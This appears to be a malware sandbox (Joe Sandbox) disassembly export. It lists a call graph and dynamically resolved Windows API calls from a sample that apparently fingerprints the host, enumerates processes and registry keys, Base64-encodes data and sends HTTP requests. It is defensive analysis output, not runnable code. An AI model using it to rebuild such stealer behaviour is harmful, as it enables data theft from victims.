13271 792468 13270->13271 13272 7945c0 2 API 
calls 13271->13272 13273 792481 13272->13273 13274 7945c0 2 API calls 13273->13274 13275 79249a 13274->13275 13276 7945c0 2 API calls 13275->13276 13277 7924b3 13276->13277 13278 7945c0 2 API calls 13277->13278 13279 7924cc 13278->13279 13280 7945c0 2 API calls 13279->13280 13281 7924e5 13280->13281 13282 7945c0 2 API calls 13281->13282 13283 7924fe 13282->13283 13284 7945c0 2 API calls 13283->13284 13285 792517 13284->13285 13286 7945c0 2 API calls 13285->13286 13287 792530 13286->13287 13288 7945c0 2 API calls 13287->13288 13289 792549 13288->13289 13290 7945c0 2 API calls 13289->13290 13291 792562 13290->13291 13292 7945c0 2 API calls 13291->13292 13293 79257b 13292->13293 13294 7945c0 2 API calls 13293->13294 13295 792594 13294->13295 13296 7945c0 2 API calls 13295->13296 13297 7925ad 13296->13297 13298 7945c0 2 API calls 13297->13298 13299 7925c6 13298->13299 13300 7945c0 2 API calls 13299->13300 13301 7925df 13300->13301 13302 7945c0 2 API calls 13301->13302 13303 7925f8 13302->13303 13304 7945c0 2 API calls 13303->13304 13305 792611 13304->13305 13306 7945c0 2 API calls 13305->13306 13307 79262a 13306->13307 13308 7945c0 2 API calls 13307->13308 13309 792643 13308->13309 13310 7945c0 2 API calls 13309->13310 13311 79265c 13310->13311 13312 7945c0 2 API calls 13311->13312 13313 792675 13312->13313 13314 7945c0 2 API calls 13313->13314 13315 79268e 13314->13315 13316 7a9860 13315->13316 13587 7a9750 GetPEB 13316->13587 13318 7a9868 13319 7a987a 13318->13319 13320 7a9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13318->13320 13323 7a988c 21 API calls 13319->13323 13321 7a9b0d 13320->13321 13322 7a9af4 GetProcAddress 13320->13322 13324 7a9b46 13321->13324 13325 7a9b16 GetProcAddress GetProcAddress 13321->13325 13322->13321 13323->13320 13326 7a9b68 13324->13326 13327 7a9b4f GetProcAddress 13324->13327 13325->13324 13328 7a9b89 13326->13328 13329 7a9b71 GetProcAddress 13326->13329 13327->13326 13330 7a9b92 GetProcAddress GetProcAddress 
14740->14741 14742 7a1b7f 14741->14742 14743 7a7500 6 API calls 14742->14743 14744 7a1b96 14743->14744 14745 7aa920 3 API calls 14744->14745 14746 7a1ba9 14745->14746 14747 7aa8a0 lstrcpy 14746->14747 14748 7a1bb2 14747->14748 14749 7aa9b0 4 API calls 14748->14749 14750 7a1bdc 14749->14750 14751 7aa8a0 lstrcpy 14750->14751 14752 7a1be5 14751->14752 14753 7aa9b0 4 API calls 14752->14753 14754 7a1c05 14753->14754 14755 7aa8a0 lstrcpy 14754->14755 14756 7a1c0e 14755->14756 15464 7a7690 GetProcessHeap RtlAllocateHeap 14756->15464 14759 7aa9b0 4 API calls 14760 7a1c2e 14759->14760 14761 7aa8a0 lstrcpy 14760->14761 14762 7a1c37 14761->14762 14763 7aa9b0 4 API calls 14762->14763 14764 7a1c56 14763->14764 14765 7aa8a0 lstrcpy 14764->14765 14766 7a1c5f 14765->14766 14767 7aa9b0 4 API calls 14766->14767 14768 7a1c80 14767->14768 14769 7aa8a0 lstrcpy 14768->14769 14770 7a1c89 14769->14770 15471 7a77c0 GetCurrentProcess IsWow64Process 14770->15471 14773 7aa9b0 4 API calls 14774 7a1ca9 14773->14774 14775 7aa8a0 lstrcpy 14774->14775 14776 7a1cb2 14775->14776 14777 7aa9b0 4 API calls 14776->14777 14778 7a1cd1 14777->14778 14779 7aa8a0 lstrcpy 14778->14779 14780 7a1cda 14779->14780 14781 7aa9b0 4 API calls 14780->14781 14782 7a1cfb 14781->14782 14783 7aa8a0 lstrcpy 14782->14783 14784 7a1d04 14783->14784 14785 7a7850 3 API calls 14784->14785 14786 7a1d14 14785->14786 14787 7aa9b0 4 API calls 14786->14787 14788 7a1d24 14787->14788 14789 7aa8a0 lstrcpy 14788->14789 14790 7a1d2d 14789->14790 14791 7aa9b0 4 API calls 14790->14791 14792 7a1d4c 14791->14792 14793 7aa8a0 lstrcpy 14792->14793 14794 7a1d55 14793->14794 14795 7aa9b0 4 API calls 14794->14795 14796 7a1d75 14795->14796 14797 7aa8a0 lstrcpy 14796->14797 14798 7a1d7e 14797->14798 14799 7a78e0 3 API calls 14798->14799 14800 7a1d8e 14799->14800 14801 7aa9b0 4 API calls 14800->14801 14802 7a1d9e 14801->14802 14803 7aa8a0 lstrcpy 14802->14803 14804 7a1da7 14803->14804 14805 7aa9b0 4 API calls 14804->14805 14806 7a1dc6 14805->14806 
14807 7aa8a0 lstrcpy 14806->14807 14808 7a1dcf 14807->14808 14809 7aa9b0 4 API calls 14808->14809 14810 7a1df0 14809->14810 14811 7aa8a0 lstrcpy 14810->14811 14812 7a1df9 14811->14812 15473 7a7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14812->15473 14815 7aa9b0 4 API calls 14816 7a1e19 14815->14816 14817 7aa8a0 lstrcpy 14816->14817 14818 7a1e22 14817->14818 14819 7aa9b0 4 API calls 14818->14819 14820 7a1e41 14819->14820 14821 7aa8a0 lstrcpy 14820->14821 14822 7a1e4a 14821->14822 14823 7aa9b0 4 API calls 14822->14823 14824 7a1e6b 14823->14824 14825 7aa8a0 lstrcpy 14824->14825 14826 7a1e74 14825->14826 15475 7a7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14826->15475 14829 7aa9b0 4 API calls 14830 7a1e94 14829->14830 14831 7aa8a0 lstrcpy 14830->14831 14832 7a1e9d 14831->14832 14833 7aa9b0 4 API calls 14832->14833 14834 7a1ebc 14833->14834 14835 7aa8a0 lstrcpy 14834->14835 14836 7a1ec5 14835->14836 14837 7aa9b0 4 API calls 14836->14837 14838 7a1ee5 14837->14838 14839 7aa8a0 lstrcpy 14838->14839 14840 7a1eee 14839->14840 15478 7a7b00 GetUserDefaultLocaleName 14840->15478 14843 7aa9b0 4 API calls 14844 7a1f0e 14843->14844 14845 7aa8a0 lstrcpy 14844->14845 14846 7a1f17 14845->14846 14847 7aa9b0 4 API calls 14846->14847 14848 7a1f36 14847->14848 14849 7aa8a0 lstrcpy 14848->14849 14850 7a1f3f 14849->14850 14851 7aa9b0 4 API calls 14850->14851 14852 7a1f60 14851->14852 14853 7aa8a0 lstrcpy 14852->14853 14854 7a1f69 14853->14854 15482 7a7b90 14854->15482 14856 7a1f80 14857 7aa920 3 API calls 14856->14857 14858 7a1f93 14857->14858 14859 7aa8a0 lstrcpy 14858->14859 14860 7a1f9c 14859->14860 14861 7aa9b0 4 API calls 14860->14861 14862 7a1fc6 14861->14862 14863 7aa8a0 lstrcpy 14862->14863 14864 7a1fcf 14863->14864 14865 7aa9b0 4 API calls 14864->14865 14866 7a1fef 14865->14866 14867 7aa8a0 lstrcpy 14866->14867 14868 7a1ff8 14867->14868 15494 7a7d80 GetSystemPowerStatus 14868->15494 14871 7aa9b0 4 API calls 14872 7a2018 14871->14872 14873 7aa8a0 
lstrcpy 14872->14873 14874 7a2021 14873->14874 14875 7aa9b0 4 API calls 14874->14875 14876 7a2040 14875->14876 14877 7aa8a0 lstrcpy 14876->14877 14878 7a2049 14877->14878 14879 7aa9b0 4 API calls 14878->14879 14880 7a206a 14879->14880 14881 7aa8a0 lstrcpy 14880->14881 14882 7a2073 14881->14882 14883 7a207e GetCurrentProcessId 14882->14883 15496 7a9470 OpenProcess 14883->15496 14886 7aa920 3 API calls 14887 7a20a4 14886->14887 14888 7aa8a0 lstrcpy 14887->14888 14889 7a20ad 14888->14889 14890 7aa9b0 4 API calls 14889->14890 14891 7a20d7 14890->14891 14892 7aa8a0 lstrcpy 14891->14892 14893 7a20e0 14892->14893 14894 7aa9b0 4 API calls 14893->14894 14895 7a2100 14894->14895 14896 7aa8a0 lstrcpy 14895->14896 14897 7a2109 14896->14897 15501 7a7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14897->15501 14900 7aa9b0 4 API calls 14901 7a2129 14900->14901 14902 7aa8a0 lstrcpy 14901->14902 14903 7a2132 14902->14903 14904 7aa9b0 4 API calls 14903->14904 14905 7a2151 14904->14905 14906 7aa8a0 lstrcpy 14905->14906 14907 7a215a 14906->14907 14908 7aa9b0 4 API calls 14907->14908 14909 7a217b 14908->14909 14910 7aa8a0 lstrcpy 14909->14910 14911 7a2184 14910->14911 15505 7a7f60 14911->15505 14914 7aa9b0 4 API calls 14915 7a21a4 14914->14915 14916 7aa8a0 lstrcpy 14915->14916 14917 7a21ad 14916->14917 14918 7aa9b0 4 API calls 14917->14918 14919 7a21cc 14918->14919 14920 7aa8a0 lstrcpy 14919->14920 14921 7a21d5 14920->14921 14922 7aa9b0 4 API calls 14921->14922 14923 7a21f6 14922->14923 14924 7aa8a0 lstrcpy 14923->14924 14925 7a21ff 14924->14925 15518 7a7ed0 GetSystemInfo wsprintfA 14925->15518 14928 7aa9b0 4 API calls 14929 7a221f 14928->14929 14930 7aa8a0 lstrcpy 14929->14930 14931 7a2228 14930->14931 14932 7aa9b0 4 API calls 14931->14932 14933 7a2247 14932->14933 14934 7aa8a0 lstrcpy 14933->14934 14935 7a2250 14934->14935 14936 7aa9b0 4 API calls 14935->14936 14937 7a2270 14936->14937 14938 7aa8a0 lstrcpy 14937->14938 14939 7a2279 14938->14939 15520 7a8100 GetProcessHeap 
RtlAllocateHeap 14939->15520 14942 7aa9b0 4 API calls 14943 7a2299 14942->14943 14944 7aa8a0 lstrcpy 14943->14944 14945 7a22a2 14944->14945 14946 7aa9b0 4 API calls 14945->14946 14947 7a22c1 14946->14947 14948 7aa8a0 lstrcpy 14947->14948 14949 7a22ca 14948->14949 14950 7aa9b0 4 API calls 14949->14950 14951 7a22eb 14950->14951 14952 7aa8a0 lstrcpy 14951->14952 14953 7a22f4 14952->14953 15526 7a87c0 14953->15526 14956 7aa920 3 API calls 14957 7a231e 14956->14957 14958 7aa8a0 lstrcpy 14957->14958 14959 7a2327 14958->14959 14960 7aa9b0 4 API calls 14959->14960 14961 7a2351 14960->14961 14962 7aa8a0 lstrcpy 14961->14962 14963 7a235a 14962->14963 14964 7aa9b0 4 API calls 14963->14964 14965 7a237a 14964->14965 14966 7aa8a0 lstrcpy 14965->14966 14967 7a2383 14966->14967 14968 7aa9b0 4 API calls 14967->14968 14969 7a23a2 14968->14969 14970 7aa8a0 lstrcpy 14969->14970 14971 7a23ab 14970->14971 15531 7a81f0 14971->15531 14973 7a23c2 14974 7aa920 3 API calls 14973->14974 14975 7a23d5 14974->14975 14976 7aa8a0 lstrcpy 14975->14976 14977 7a23de 14976->14977 14978 7aa9b0 4 API calls 14977->14978 14979 7a240a 14978->14979 14980 7aa8a0 lstrcpy 14979->14980 14981 7a2413 14980->14981 14982 7aa9b0 4 API calls 14981->14982 14983 7a2432 14982->14983 14984 7aa8a0 lstrcpy 14983->14984 14985 7a243b 14984->14985 14986 7aa9b0 4 API calls 14985->14986 14987 7a245c 14986->14987 14988 7aa8a0 lstrcpy 14987->14988 14989 7a2465 14988->14989 14990 7aa9b0 4 API calls 14989->14990 14991 7a2484 14990->14991 14992 7aa8a0 lstrcpy 14991->14992 14993 7a248d 14992->14993 14994 7aa9b0 4 API calls 14993->14994 14995 7a24ae 14994->14995 14996 7aa8a0 lstrcpy 14995->14996 14997 7a24b7 14996->14997 15539 7a8320 14997->15539 14999 7a24d3 15000 7aa920 3 API calls 14999->15000 15001 7a24e6 15000->15001 15002 7aa8a0 lstrcpy 15001->15002 15003 7a24ef 15002->15003 15004 7aa9b0 4 API calls 15003->15004 15005 7a2519 15004->15005 15006 7aa8a0 lstrcpy 15005->15006 15007 7a2522 15006->15007 15008 7aa9b0 4 API calls 
15007->15008 15009 7a2543 15008->15009 15010 7aa8a0 lstrcpy 15009->15010 15011 7a254c 15010->15011 15012 7a8320 17 API calls 15011->15012 15013 7a2568 15012->15013 15014 7aa920 3 API calls 15013->15014 15015 7a257b 15014->15015 15016 7aa8a0 lstrcpy 15015->15016 15017 7a2584 15016->15017 15018 7aa9b0 4 API calls 15017->15018 15019 7a25ae 15018->15019 15020 7aa8a0 lstrcpy 15019->15020 15021 7a25b7 15020->15021 15022 7aa9b0 4 API calls 15021->15022 15023 7a25d6 15022->15023 15024 7aa8a0 lstrcpy 15023->15024 15025 7a25df 15024->15025 15026 7aa9b0 4 API calls 15025->15026 15027 7a2600 15026->15027 15028 7aa8a0 lstrcpy 15027->15028 15029 7a2609 15028->15029 15575 7a8680 15029->15575 15031 7a2620 15032 7aa920 3 API calls 15031->15032 15033 7a2633 15032->15033 15034 7aa8a0 lstrcpy 15033->15034 15035 7a263c 15034->15035 15036 7a265a lstrlen 15035->15036 15037 7a266a 15036->15037 15038 7aa740 lstrcpy 15037->15038 15039 7a267c 15038->15039 15040 791590 lstrcpy 15039->15040 15041 7a268d 15040->15041 15585 7a5190 15041->15585 15043 7a2699 15043->13475 15773 7aaad0 15044->15773 15046 795009 InternetOpenUrlA 15049 795021 15046->15049 15047 79502a InternetReadFile 15047->15049 15048 7950a0 InternetCloseHandle InternetCloseHandle 15050 7950ec 15048->15050 15049->15047 15049->15048 15050->13479 15774 7998d0 15051->15774 15053 7a0759 15054 7a0a38 15053->15054 15055 7a077d 15053->15055 15056 791590 lstrcpy 15054->15056 15058 7a0799 StrCmpCA 15055->15058 15057 7a0a49 15056->15057 15950 7a0250 15057->15950 15060 7a07a8 15058->15060 15087 7a0843 15058->15087 15062 7aa7a0 lstrcpy 15060->15062 15064 7a07c3 15062->15064 15063 7a0865 StrCmpCA 15065 7a0874 15063->15065 15103 7a096b 15063->15103 15066 791590 lstrcpy 15064->15066 15067 7aa740 lstrcpy 15065->15067 15068 7a080c 15066->15068 15070 7a0881 15067->15070 15071 7aa7a0 lstrcpy 15068->15071 15069 7a099c StrCmpCA 15072 7a09ab 15069->15072 15073 7a0a2d 15069->15073 15074 7aa9b0 4 API calls 15070->15074 15075 7a0823 15071->15075 15076 
791590 lstrcpy 15072->15076 15073->13483 15077 7a08ac 15074->15077 15078 7aa7a0 lstrcpy 15075->15078 15079 7a09f4 15076->15079 15080 7aa920 3 API calls 15077->15080 15081 7a083e 15078->15081 15082 7aa7a0 lstrcpy 15079->15082 15083 7a08b3 15080->15083 15777 79fb00 15081->15777 15085 7a0a0d 15082->15085 15086 7aa9b0 4 API calls 15083->15086 15088 7aa7a0 lstrcpy 15085->15088 15089 7a08ba 15086->15089 15087->15063 15090 7a0a28 15088->15090 15091 7aa8a0 lstrcpy 15089->15091 15893 7a0030 15090->15893 15103->15069 15425 7aa7a0 lstrcpy 15424->15425 15426 791683 15425->15426 15427 7aa7a0 lstrcpy 15426->15427 15428 791695 15427->15428 15429 7aa7a0 lstrcpy 15428->15429 15430 7916a7 15429->15430 15431 7aa7a0 lstrcpy 15430->15431 15432 7915a3 15431->15432 15432->14306 15434 7947c6 15433->15434 15435 794838 lstrlen 15434->15435 15459 7aaad0 15435->15459 15437 794848 InternetCrackUrlA 15438 794867 15437->15438 15438->14383 15440 7aa740 lstrcpy 15439->15440 15441 7a8b74 15440->15441 15442 7aa740 lstrcpy 15441->15442 15443 7a8b82 GetSystemTime 15442->15443 15444 7a8b99 15443->15444 15445 7aa7a0 lstrcpy 15444->15445 15446 7a8bfc 15445->15446 15446->14398 15448 7aa931 15447->15448 15449 7aa988 15448->15449 15452 7aa968 lstrcpy lstrcat 15448->15452 15450 7aa7a0 lstrcpy 15449->15450 15451 7aa994 15450->15451 15451->14401 15452->15449 15453->14516 15455 799af9 LocalAlloc 15454->15455 15456 794eee 15454->15456 15455->15456 15457 799b14 CryptStringToBinaryA 15455->15457 15456->14404 15456->14407 15457->15456 15458 799b39 LocalFree 15457->15458 15458->15456 15459->15437 15460->14526 15461->14667 15462->14669 15463->14677 15592 7a77a0 15464->15592 15467 7a76c6 RegOpenKeyExA 15469 7a76e7 RegQueryValueExA 15467->15469 15470 7a7704 RegCloseKey 15467->15470 15468 7a1c1e 15468->14759 15469->15470 15470->15468 15472 7a1c99 15471->15472 15472->14773 15474 7a1e09 15473->15474 15474->14815 15476 7a7a9a wsprintfA 15475->15476 15477 7a1e84 15475->15477 15476->15477 15477->14829 15479 7a7b4d 
15478->15479 15481 7a1efe 15478->15481 15599 7a8d20 LocalAlloc CharToOemW 15479->15599 15481->14843 15483 7aa740 lstrcpy 15482->15483 15484 7a7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15483->15484 15493 7a7c25 15484->15493 15485 7a7d18 15487 7a7d28 15485->15487 15488 7a7d1e LocalFree 15485->15488 15486 7a7c46 GetLocaleInfoA 15486->15493 15489 7aa7a0 lstrcpy 15487->15489 15488->15487 15492 7a7d37 15489->15492 15490 7aa8a0 lstrcpy 15490->15493 15491 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15491->15493 15492->14856 15493->15485 15493->15486 15493->15490 15493->15491 15495 7a2008 15494->15495 15495->14871 15497 7a9493 GetModuleFileNameExA CloseHandle 15496->15497 15498 7a94b5 15496->15498 15497->15498 15499 7aa740 lstrcpy 15498->15499 15500 7a2091 15499->15500 15500->14886 15502 7a7e68 RegQueryValueExA 15501->15502 15504 7a2119 15501->15504 15503 7a7e8e RegCloseKey 15502->15503 15503->15504 15504->14900 15506 7a7fb9 GetLogicalProcessorInformationEx 15505->15506 15507 7a7fd8 GetLastError 15506->15507 15508 7a8029 15506->15508 15511 7a8022 15507->15511 15517 7a7fe3 15507->15517 15513 7a89f0 2 API calls 15508->15513 15510 7a2194 15510->14914 15511->15510 15514 7a89f0 2 API calls 15511->15514 15515 7a807b 15513->15515 15514->15510 15515->15511 15516 7a8084 wsprintfA 15515->15516 15516->15510 15517->15506 15517->15510 15600 7a89f0 15517->15600 15603 7a8a10 GetProcessHeap RtlAllocateHeap 15517->15603 15519 7a220f 15518->15519 15519->14928 15521 7a89b0 15520->15521 15522 7a814d GlobalMemoryStatusEx 15521->15522 15523 7a8163 __aulldiv 15522->15523 15524 7a819b wsprintfA 15523->15524 15525 7a2289 15524->15525 15525->14942 15527 7a87fb GetProcessHeap RtlAllocateHeap wsprintfA 15526->15527 15529 7aa740 lstrcpy 15527->15529 15530 7a230b 15529->15530 15530->14956 15532 7aa740 lstrcpy 15531->15532 15538 7a8229 15532->15538 15533 7a8263 15535 7aa7a0 lstrcpy 15533->15535 15534 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15534->15538 15536 7a82dc 15535->15536 15536->14973 
15537 7aa8a0 lstrcpy 15537->15538 15538->15533 15538->15534 15538->15537 15540 7aa740 lstrcpy 15539->15540 15541 7a835c RegOpenKeyExA 15540->15541 15542 7a83ae 15541->15542 15543 7a83d0 15541->15543 15544 7aa7a0 lstrcpy 15542->15544 15545 7a83f8 RegEnumKeyExA 15543->15545 15546 7a8613 RegCloseKey 15543->15546 15555 7a83bd 15544->15555 15547 7a860e 15545->15547 15548 7a843f wsprintfA RegOpenKeyExA 15545->15548 15549 7aa7a0 lstrcpy 15546->15549 15547->15546 15550 7a84c1 RegQueryValueExA 15548->15550 15551 7a8485 RegCloseKey RegCloseKey 15548->15551 15549->15555 15553 7a84fa lstrlen 15550->15553 15554 7a8601 RegCloseKey 15550->15554 15552 7aa7a0 lstrcpy 15551->15552 15552->15555 15553->15554 15556 7a8510 15553->15556 15554->15547 15555->14999 15557 7aa9b0 4 API calls 15556->15557 15558 7a8527 15557->15558 15559 7aa8a0 lstrcpy 15558->15559 15560 7a8533 15559->15560 15561 7aa9b0 4 API calls 15560->15561 15562 7a8557 15561->15562 15563 7aa8a0 lstrcpy 15562->15563 15564 7a8563 15563->15564 15565 7a856e RegQueryValueExA 15564->15565 15565->15554 15566 7a85a3 15565->15566 15567 7aa9b0 4 API calls 15566->15567 15568 7a85ba 15567->15568 15569 7aa8a0 lstrcpy 15568->15569 15570 7a85c6 15569->15570 15571 7aa9b0 4 API calls 15570->15571 15572 7a85ea 15571->15572 15573 7aa8a0 lstrcpy 15572->15573 15574 7a85f6 15573->15574 15574->15554 15576 7aa740 lstrcpy 15575->15576 15577 7a86bc CreateToolhelp32Snapshot Process32First 15576->15577 15578 7a86e8 Process32Next 15577->15578 15579 7a875d CloseHandle 15577->15579 15578->15579 15581 7a86fd 15578->15581 15580 7aa7a0 lstrcpy 15579->15580 15583 7a8776 15580->15583 15581->15578 15582 7aa8a0 lstrcpy 15581->15582 15584 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15581->15584 15582->15581 15583->15031 15584->15581 15586 7aa7a0 lstrcpy 15585->15586 15587 7a51b5 15586->15587 15588 791590 lstrcpy 15587->15588 15589 7a51c6 15588->15589 15604 795100 15589->15604 15591 7a51cf 15591->15043 15595 7a7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
15592->15595 15594 7a76b9 15594->15467 15594->15468 15596 7a7780 RegCloseKey 15595->15596 15597 7a7765 RegQueryValueExA 15595->15597 15598 7a7793 15596->15598 15597->15596 15598->15594 15599->15481 15601 7a89f9 GetProcessHeap HeapFree 15600->15601 15602 7a8a0c 15600->15602 15601->15602 15602->15517 15603->15517 15605 7aa7a0 lstrcpy 15604->15605 15606 795119 15605->15606 15607 7947b0 2 API calls 15606->15607 15608 795125 15607->15608 15764 7a8ea0 15608->15764 15610 795184 15611 795192 lstrlen 15610->15611 15612 7951a5 15611->15612 15613 7a8ea0 4 API calls 15612->15613 15614 7951b6 15613->15614 15615 7aa740 lstrcpy 15614->15615 15616 7951c9 15615->15616 15617 7aa740 lstrcpy 15616->15617 15618 7951d6 15617->15618 15619 7aa740 lstrcpy 15618->15619 15620 7951e3 15619->15620 15621 7aa740 lstrcpy 15620->15621 15622 7951f0 15621->15622 15623 7aa740 lstrcpy 15622->15623 15624 7951fd InternetOpenA StrCmpCA 15623->15624 15625 79522f 15624->15625 15626 7958c4 InternetCloseHandle 15625->15626 15627 7a8b60 3 API calls 15625->15627 15633 7958d9 ctype 15626->15633 15628 79524e 15627->15628 15629 7aa920 3 API calls 15628->15629 15630 795261 15629->15630 15631 7aa8a0 lstrcpy 15630->15631 15632 79526a 15631->15632 15634 7aa9b0 4 API calls 15632->15634 15637 7aa7a0 lstrcpy 15633->15637 15635 7952ab 15634->15635 15636 7aa920 3 API calls 15635->15636 15638 7952b2 15636->15638 15645 795913 15637->15645 15639 7aa9b0 4 API calls 15638->15639 15640 7952b9 15639->15640 15641 7aa8a0 lstrcpy 15640->15641 15642 7952c2 15641->15642 15643 7aa9b0 4 API calls 15642->15643 15644 795303 15643->15644 15646 7aa920 3 API calls 15644->15646 15645->15591 15647 79530a 15646->15647 15648 7aa8a0 lstrcpy 15647->15648 15649 795313 15648->15649 15650 795329 InternetConnectA 15649->15650 15650->15626 15651 795359 HttpOpenRequestA 15650->15651 15653 7958b7 InternetCloseHandle 15651->15653 15654 7953b7 15651->15654 15653->15626 15655 7aa9b0 4 API calls 15654->15655 15656 7953cb 15655->15656 15657 7aa8a0 lstrcpy 
15656->15657 15658 7953d4 15657->15658 15659 7aa920 3 API calls 15658->15659 15660 7953f2 15659->15660 15661 7aa8a0 lstrcpy 15660->15661 15662 7953fb 15661->15662 15663 7aa9b0 4 API calls 15662->15663 15664 79541a 15663->15664 15665 7aa8a0 lstrcpy 15664->15665 15666 795423 15665->15666 15667 7aa9b0 4 API calls 15666->15667 15668 795444 15667->15668 15669 7aa8a0 lstrcpy 15668->15669 15670 79544d 15669->15670 15671 7aa9b0 4 API calls 15670->15671 15672 79546e 15671->15672 15673 7aa8a0 lstrcpy 15672->15673 15765 7a8ead CryptBinaryToStringA 15764->15765 15767 7a8ea9 15764->15767 15766 7a8ece GetProcessHeap RtlAllocateHeap 15765->15766 15765->15767 15766->15767 15768 7a8ef4 ctype 15766->15768 15767->15610 15769 7a8f05 CryptBinaryToStringA 15768->15769 15769->15767 15773->15046 16016 799880 15774->16016 15776 7998e1 15776->15053 15778 7aa740 lstrcpy 15777->15778 15779 79fb16 15778->15779 15951 7aa740 lstrcpy 15950->15951 15952 7a0266 15951->15952 15953 7a8de0 2 API calls 15952->15953 15954 7a027b 15953->15954 15955 7aa920 3 API calls 15954->15955 15956 7a028b 15955->15956 15957 7aa8a0 lstrcpy 15956->15957 15958 7a0294 15957->15958 15959 7aa9b0 4 API calls 15958->15959 15960 7a02b8 15959->15960 16017 79988e 16016->16017 16020 796fb0 16017->16020 16019 7998ad ctype 16019->15776 16023 796d40 16020->16023 16024 796d59 16023->16024 16025 796d63 16023->16025 16024->16019 16025->16024 16037 796660 16025->16037 16027 796dbe 16027->16024 16043 7969b0 16027->16043 16029 796e2a 16029->16024 16030 796ef7 16029->16030 16031 796ee6 VirtualFree 16029->16031 16032 796f38 16030->16032 16033 796f26 FreeLibrary 16030->16033 16036 796f41 16030->16036 16031->16030 16035 7a89f0 2 API calls 16032->16035 16033->16030 16034 7a89f0 2 API calls 16034->16024 16035->16036 16036->16024 16036->16034 16038 79668f VirtualAlloc 16037->16038 16040 796730 16038->16040 16041 79673c 16038->16041 16040->16041 16042 796743 VirtualAlloc 16040->16042 16041->16027 16042->16041 16044 7969c9 16043->16044 16046 
7969d5 16043->16046 16045 796a09 LoadLibraryA 16044->16045 16044->16046 16045->16046 16047 796a32 16045->16047 16046->16029 16050 796ae0 16047->16050 16053 7a8a10 GetProcessHeap RtlAllocateHeap 16047->16053 16049 796ba8 GetProcAddress 16049->16046 16049->16050 16050->16046 16050->16049 16051 7a89f0 2 API calls 16051->16050 16052 796a8b 16052->16046 16052->16051 16053->16052

                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014C23B0), ref: 007A98A1
                              • GetProcAddress.KERNEL32(74DD0000,014C23C8), ref: 007A98BA
                              • GetProcAddress.KERNEL32(74DD0000,014C2200), ref: 007A98D2
                              • GetProcAddress.KERNEL32(74DD0000,014C23E0), ref: 007A98EA
                              • GetProcAddress.KERNEL32(74DD0000,014C2410), ref: 007A9903
                              • GetProcAddress.KERNEL32(74DD0000,014C8F30), ref: 007A991B
                              • GetProcAddress.KERNEL32(74DD0000,014B52F0), ref: 007A9933
                              • GetProcAddress.KERNEL32(74DD0000,014B5390), ref: 007A994C
                              • GetProcAddress.KERNEL32(74DD0000,014C2428), ref: 007A9964
                              • GetProcAddress.KERNEL32(74DD0000,014C2440), ref: 007A997C
                              • GetProcAddress.KERNEL32(74DD0000,014C2458), ref: 007A9995
                              • GetProcAddress.KERNEL32(74DD0000,014C2170), ref: 007A99AD
                              • GetProcAddress.KERNEL32(74DD0000,014B53F0), ref: 007A99C5
                              • GetProcAddress.KERNEL32(74DD0000,014C21B8), ref: 007A99DE
                              • GetProcAddress.KERNEL32(74DD0000,014C2218), ref: 007A99F6
                              • GetProcAddress.KERNEL32(74DD0000,014B5330), ref: 007A9A0E
                              • GetProcAddress.KERNEL32(74DD0000,014C2248), ref: 007A9A27
                              • GetProcAddress.KERNEL32(74DD0000,014C22A8), ref: 007A9A3F
                              • GetProcAddress.KERNEL32(74DD0000,014B5230), ref: 007A9A57
                              • GetProcAddress.KERNEL32(74DD0000,014C22C0), ref: 007A9A70
                              • GetProcAddress.KERNEL32(74DD0000,014B55B0), ref: 007A9A88
                              • LoadLibraryA.KERNEL32(014C2518,?,007A6A00), ref: 007A9A9A
                              • LoadLibraryA.KERNEL32(014C2530,?,007A6A00), ref: 007A9AAB
                              • LoadLibraryA.KERNEL32(014C2488,?,007A6A00), ref: 007A9ABD
                              • LoadLibraryA.KERNEL32(014C2470,?,007A6A00), ref: 007A9ACF
                              • LoadLibraryA.KERNEL32(014C24B8,?,007A6A00), ref: 007A9AE0
                              • GetProcAddress.KERNEL32(75A70000,014C24A0), ref: 007A9B02
                              • GetProcAddress.KERNEL32(75290000,014C24E8), ref: 007A9B23
                              • GetProcAddress.KERNEL32(75290000,014C24D0), ref: 007A9B3B
                              • GetProcAddress.KERNEL32(75BD0000,014C2500), ref: 007A9B5D
                              • GetProcAddress.KERNEL32(75450000,014B53D0), ref: 007A9B7E
                              • GetProcAddress.KERNEL32(76E90000,014C8EF0), ref: 007A9B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 007A9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 007A9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
